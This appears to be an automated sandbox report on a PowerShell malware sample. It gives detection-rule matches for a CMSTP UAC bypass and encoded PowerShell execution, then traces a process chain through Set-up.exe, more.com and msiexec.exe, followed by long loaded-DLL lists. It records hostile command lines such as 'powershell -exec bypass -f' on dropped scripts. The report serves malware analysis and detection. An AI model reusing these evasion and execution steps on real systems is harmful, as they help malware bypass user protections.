                    Source: 6.2.more.com.508f6cd.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.Set-up.exe.3b2a944.7.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 9.2.msiexec.exe.51dfacd.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 10.2.more.com.43e2acd.5.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 10.2.more.com.43e36cd.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.msiexec.exe.50f5a00.5.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.msiexec.exe.513b6cd.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.Set-up.exe.370d877.9.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: Process Memory Space: powershell.exe PID: 1856, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: UpdateClient.dll.0.dr, SimpleZip.cs, Cryptographic APIs: 'CreateDecryptor'
                    Source: UpdateClient.dll.0.dr, SimpleZip.cs, Cryptographic APIs: 'TransformFinalBlock'
                    Source: UpdateCommon.dll.0.dr, SimpleZip.cs, Cryptographic APIs: 'CreateDecryptor'
                    Source: UpdateCommon.dll.0.dr, SimpleZip.cs, Cryptographic APIs: 'TransformFinalBlock'
                    Source: UpdateCommon.dll.0.dr, InstalledModule.cs, Cryptographic APIs: 'CreateDecryptor'
                    Source: classification engine, Classification label: mal100.troj.spyw.expl.evad.winPS1@19/224@2/2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\jcysbXpH.zip
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4268:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tltwzlfm.vxx.ps1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File read: C:\Users\desktop.ini
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                    Source: unknown, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe, Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                    Source: C:\Windows\SysWOW64\more.com, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown, Process created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
                    Source: C:\Windows\SysWOW64\more.com, Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe, Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                    Source: C:\Windows\SysWOW64\more.com, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown, Process created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
                    Source: C:\Windows\SysWOW64\more.com, Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
                    Source: C:\Windows\SysWOW64\msiexec.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: starburn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtcore4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtgui4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtnetwork4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtxml4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: pla.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: pdh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: tdh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: wevtapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: starburn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtcore4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtgui4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtnetwork4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtxml4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: pla.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: pdh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: tdh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: wevtapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: starburn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtcore4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtgui4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtnetwork4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtxml4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: pla.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: pdh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: tdh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: wevtapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: IaslcsMo.ps1Static file information: File size 31179107 > 1048576
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dllJump to behavior
                    Source: Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdb source: powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Set-up.exe, 00000008.00000002.2146378325.000000006BB51000.00000020.00000001.01000000.00000010.sdmp
                    Source: Binary string: msvcp100.i386.pdb source: Set-up.exe, Set-up.exe, 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp
                    Source: Binary string: dmprocessxmlfiltered.pdbGCTL source: more.com, 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmp
